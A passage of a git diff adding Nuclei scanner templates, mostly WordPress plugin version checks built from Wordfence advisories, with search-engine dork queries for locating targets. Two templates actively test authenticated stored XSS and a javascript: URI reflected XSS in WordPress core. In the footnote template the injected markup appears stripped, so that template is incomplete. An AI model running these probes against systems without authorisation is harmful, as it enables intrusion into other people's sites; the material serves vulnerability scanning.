+ +info: + name: > + Anchor Episodes Index (Spotify for Podcasters) <= 2.1.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via anchor_episodes Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/anchor-episodes-index/" + google-query: inurl:"/wp-content/plugins/anchor-episodes-index/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,anchor-episodes-index,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/anchor-episodes-index/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "anchor-episodes-index" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.10') \ No newline at end of file diff --git a/poc/other/broken-access-control.yaml b/poc/other/broken-access-control.yaml new file mode 100644 index 0000000000..90095c158d --- /dev/null +++ b/poc/other/broken-access-control.yaml @@ -0,0 +1,20 @@ +id: broken-access-control +info: + name: Broken Access Control + author: Ali Baykara + severity: critical + description: | + Checks for the presence of broken access control vulnerabilities by attempting unauthorized access to admin areas. + tags: owasp, access-control + +requests: + - method: GET + path: + - "{{BaseURL}}/admin" + matchers: + - type: status + status: + - 200 + - type: word + words: + - "admin panel" diff --git a/poc/other/cryptographic-failures.yaml b/poc/other/cryptographic-failures.yaml new file mode 100644 index 0000000000..4ad2d4a659 --- /dev/null +++ b/poc/other/cryptographic-failures.yaml @@ -0,0 +1,20 @@ +id: cryptographic-failures +info: + name: Cryptographic Failures + author: Ali Baykara + severity: high + description: | + Detects potential cryptographic failures by checking for exposed sensitive files like .git/config. + tags: owasp, cryptography + +requests: + - method: GET + path: + - "{{BaseURL}}/.git/config" + matchers: + - type: word + words: + - "[core]" + - type: status + status: + - 200 diff --git a/poc/other/insecure-design.yaml b/poc/other/insecure-design.yaml new file mode 100644 index 0000000000..7215c36860 --- /dev/null +++ b/poc/other/insecure-design.yaml @@ -0,0 +1,17 @@ +id: insecure-design +info: + name: Insecure Design (Sensitive Data Exposure) + author: Ali Baykara + severity: high + description: | + Checks for the exposure of sensitive data such as SSNs or other personally identifiable information (PII). + tags: owasp, insecure-design, sensitive-data + +requests: + - method: GET + path: + - "{{BaseURL}}/sensitive-data" + matchers: + - type: word + words: + - "SSN" diff --git a/poc/other/logging-monitoring-failures.yaml b/poc/other/logging-monitoring-failures.yaml new file mode 100644 index 0000000000..9bde19240d --- /dev/null +++ b/poc/other/logging-monitoring-failures.yaml @@ -0,0 +1,17 @@ +id: logging-monitoring-failures +info: + name: Security Logging and Monitoring Failures + author: Ali Baykara + severity: medium + description: | + Checks for the presence of logging and monitoring misconfigurations. + tags: owasp, logging, monitoring + +requests: + - method: GET + path: + - "{{BaseURL}}/logs" + matchers: + - type: word + words: + - "log" diff --git a/poc/other/news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b.yaml b/poc/other/news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b.yaml new file mode 100644 index 0000000000..5018cbfc0f --- /dev/null +++ b/poc/other/news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b.yaml @@ -0,0 +1,59 @@ +id: news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b + +info: + name: > + News Kit Elementor Addons <= 1.2.1 - Authenticated (Contributor+) Sensitive Information Exposure via Canvas Menu Elementor Template + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffc5408c-ca31-4cb6-8cb5-063acbbad01e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/news-kit-elementor-addons/" + google-query: inurl:"/wp-content/plugins/news-kit-elementor-addons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,news-kit-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/news-kit-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "news-kit-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/other/rover-idx-1f34dcc286ffc93fb3e1b0d211037251.yaml b/poc/other/rover-idx-1f34dcc286ffc93fb3e1b0d211037251.yaml new file mode 100644 index 0000000000..67651fb744 --- /dev/null +++ b/poc/other/rover-idx-1f34dcc286ffc93fb3e1b0d211037251.yaml @@ -0,0 +1,59 @@ +id: rover-idx-1f34dcc286ffc93fb3e1b0d211037251 + +info: + name: > + Rover IDX <= 3.0.0.2903 - Authenticated (Subscriber+) Missing Authorization via Multiple Functions + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdf67099-5514-45ba-9a4c-10af984bf593?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/rover-idx/" + google-query: inurl:"/wp-content/plugins/rover-idx/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,rover-idx,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rover-idx/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rover-idx" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.0.2903') \ No newline at end of file diff --git a/poc/other/rover-idx-62be7d19aacd1dc53511b643f4c494f8.yaml b/poc/other/rover-idx-62be7d19aacd1dc53511b643f4c494f8.yaml new file mode 100644 index 0000000000..ca739cbda7 --- /dev/null +++ b/poc/other/rover-idx-62be7d19aacd1dc53511b643f4c494f8.yaml @@ -0,0 +1,59 @@ +id: rover-idx-62be7d19aacd1dc53511b643f4c494f8 + +info: + name: > + Rover IDX <= 3.0.0.2905 - Authenticated (Subscriber+) Authentication Bypass to Administrator + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/rover-idx/" + google-query: inurl:"/wp-content/plugins/rover-idx/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,rover-idx,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rover-idx/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rover-idx" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.0.2905') \ No newline at end of file diff --git a/poc/other/software-integrity-failures.yaml b/poc/other/software-integrity-failures.yaml new file mode 100644 index 0000000000..df934f8617 --- /dev/null +++ b/poc/other/software-integrity-failures.yaml @@ -0,0 +1,17 @@ +id: software-integrity-failures +info: + name: Software and Data Integrity Failures + author: Ali Baykara + severity: high + description: | + Detects potential software integrity issues such as checksum mismatches or file tampering. + tags: owasp, integrity-failure + +requests: + - method: GET + path: + - "{{BaseURL}}/integrity-check" + matchers: + - type: word + words: + - "checksum mismatch" diff --git a/poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml b/poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml new file mode 100644 index 0000000000..d6d9e2d977 --- /dev/null +++ b/poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9231-db808094493fa9c79c27a8695747553b + +info: + name: > + WP-Members Membership Plugin <= 3.4.9.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP-Members Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.9.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d59e599-59da-4c03-b71f-d00a078b2442?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9231 + metadata: + fofa-query: "wp-content/plugins/wp-members/" + google-query: inurl:"/wp-content/plugins/wp-members/" + shodan-query: 'vuln:CVE-2024-9231' + tags: cve,wordpress,wp-plugin,wp-members,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-members/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-members" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.9.5') \ No newline at end of file diff --git a/poc/sql/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml b/poc/sql/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml new file mode 100644 index 0000000000..c9637d5d13 --- /dev/null +++ b/poc/sql/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml @@ -0,0 +1,59 @@ +id: green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c + +info: + name: > + TeploBot - Telegram Bot for WP <= 1.3 - Telegram Bot Token Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/green-wp-telegram-bot-by-teplitsa/" + google-query: inurl:"/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,green-wp-telegram-bot-by-teplitsa,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "green-wp-telegram-bot-by-teplitsa" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/sql/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml b/poc/sql/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml new file mode 100644 index 0000000000..42815ac58a --- /dev/null +++ b/poc/sql/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml @@ -0,0 +1,59 @@ +id: wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Cross-Site Request Forgery to Taxonomy Meta Add/Delete + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/wordpress/all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551.yaml b/poc/wordpress/all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551.yaml new file mode 100644 index 0000000000..6adb054675 --- /dev/null +++ b/poc/wordpress/all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551.yaml @@ -0,0 +1,59 @@ +id: all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551 + +info: + name: > + All-in-One WP Migration and Backup <= 7.86 - Unauthenticated Information Disclosure via Error Logs + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c4901d9d-7b37-40d5-a42b-59c80bbbe8ff?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/all-in-one-wp-migration/" + google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-in-one-wp-migration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.86') \ No newline at end of file diff --git a/poc/wordpress/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml b/poc/wordpress/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml new file mode 100644 index 0000000000..c9637d5d13 --- /dev/null +++ b/poc/wordpress/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml @@ -0,0 +1,59 @@ +id: green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c + +info: + name: > + TeploBot - Telegram Bot for WP <= 1.3 - Telegram Bot Token Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/green-wp-telegram-bot-by-teplitsa/" + google-query: inurl:"/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,green-wp-telegram-bot-by-teplitsa,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "green-wp-telegram-bot-by-teplitsa" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/wordpress/wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca.yaml b/poc/wordpress/wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca.yaml new file mode 100644 index 0000000000..1b6b4f0928 --- /dev/null +++ b/poc/wordpress/wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca.yaml @@ -0,0 +1,59 @@ +id: wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca + +info: + name: > + Category and Taxonomy Image <= 1.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5760933b-30e6-465b-9b94-c913b21f07fd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-image/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-image/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/wordpress/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml b/poc/wordpress/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml new file mode 100644 index 0000000000..42815ac58a --- /dev/null +++ b/poc/wordpress/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml @@ -0,0 +1,59 @@ +id: wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Cross-Site Request Forgery to Taxonomy Meta Add/Delete + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/wordpress/wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769.yaml b/poc/wordpress/wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769.yaml new file mode 100644 index 0000000000..d0ba3aba6c --- /dev/null +++ b/poc/wordpress/wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769.yaml @@ -0,0 +1,59 @@ +id: wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769 + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3f6d9c23-53e9-4393-beff-2f996c279ad8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/wordpress/wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d.yaml b/poc/wordpress/wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d.yaml new file mode 100644 index 0000000000..a3576d9147 --- /dev/null +++ b/poc/wordpress/wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d.yaml @@ -0,0 +1,59 @@ +id: wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9d879fc6-97ec-4ecb-99c8-7fc0b91692ef?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/wordpress/wp-footnote-xss.yaml b/poc/wordpress/wp-footnote-xss.yaml new file mode 100644 index 0000000000..9af6fd41f7 --- /dev/null +++ b/poc/wordpress/wp-footnote-xss.yaml @@ -0,0 +1,87 @@ +id: wp-footnote-xss + +info: + name: WordPress 6.3-6.3.1 Footnotes Block - Cross-Site Scripting + author: nqdung2002 + severity: medium + description: | + WordPress does not escape some of its Footnotes block options before outputting them back in a page/post where the block is embed. + impact: | + This could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-63-631-authenticatedcontributor-cross-site-scripting-via-footnotes-block?asset_slug=wordpress + - https://wpscan.com/vulnerability/63270b61-dddd-4cc0-a091-a04cb4f682ec/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cwe-id: CWE-79 + metadata: + max-request: 4 + framework: wordpress + tags: wpscan,xss,wp,wordpress,footnote,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/post-new.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /?rest_route=/wp/v2/posts/{{postid}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-HTTP-Method-Override: PUT + X-WP-Nonce: {{nonce}} + + { + "id": {{postid}}, + "title": "Stored XSS via Footnote Block", + "content": "\n

Test CVE1

\n\n\n", + "meta": { + "footnotes": "[{\"content\":\"\",\"id\":\"testid\"}]" + }, + "status": "pending" + } + + - | + GET /?p={{postid}} HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code_4 == 200' + - 'contains(body_4, "")' + - 'contains(header_4, "text/html")' + condition: and + + extractors: + - type: regex + name: postid + part: body_2 + group: 1 + regex: + - 'post=(\d+)' + internal: true + + - type: regex + name: nonce + part: body_2 + group: 1 + regex: + - 'createNonceMiddleware\(\s"(.*)\"\s\)' + internal: true + +# digest: 4a0a004730450220286bf1fe3dfd6257d48badcbd97cf02115d6200716f48a44f0db64aa7bae592a022100f0c98085b7cfec6178569dcb7bf73f45d94fb18cbb5633054a1fe2eeb6e6809e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/wordpress/wp-members-d9bd5a558214a2feec4d73014329df0f.yaml b/poc/wordpress/wp-members-d9bd5a558214a2feec4d73014329df0f.yaml new file mode 100644 index 0000000000..0ec830cb71 --- /dev/null +++ b/poc/wordpress/wp-members-d9bd5a558214a2feec4d73014329df0f.yaml @@ -0,0 +1,59 @@ +id: wp-members-d9bd5a558214a2feec4d73014329df0f + +info: + name: > + WP-Members Membership Plugin <= 3.4.9.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d59e599-59da-4c03-b71f-d00a078b2442?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-members/" + google-query: inurl:"/wp-content/plugins/wp-members/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-members,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-members/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-members" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.9.5') \ No newline at end of file diff --git a/poc/xss/application-pass-xss.yaml b/poc/xss/application-pass-xss.yaml new file mode 100644 index 0000000000..7c6ed70b5d --- /dev/null +++ b/poc/xss/application-pass-xss.yaml @@ -0,0 +1,61 @@ +id: application-pass-xss + +info: + name: WordPress Core 5.6 and 6.3.1 - Cross-Site Scripting + author: nqdung2002 + severity: medium + description: | + WordPress Core is vulnerable to Reflected Cross-Site Scripting via the 'success_url' and 'reject_url' parameters when requesting application passwords in versions between 5.6 and 6.3.1 due to insufficient input sanitization and output escaping of pseudo protocol URIs. + impact: | + This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link and accepting or rejecting the application password. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-56-631-reflected-cross-site-scripting-via-application-password-requests?asset_slug=wordpress + - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + max-request: 3 + vendor: wordpress + product: wordpress + framework: wordpress + shodan-query: + - cpe:"cpe:2.3:a:wordpress:wordpress" + - http.component:"wordpress" + fofa-query: body="oembed" && body="wp-" + tags: wpscan,wp,wordpress,authenticated,xss + +http: + - raw: + - | + GET /wp-login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "/wp-content/plugins")' + internal: true + + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/authorize-application.php?success_url=javascript%3Aalert%28document.domain%29&reject_url=javascript%3Aalert%28document.domain%29 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_2, "javascript:alert(document.domain)")' + - 'contains(content_type_2, "text/html")' + - 'status_code_2 == 200' + condition: and + +# digest: 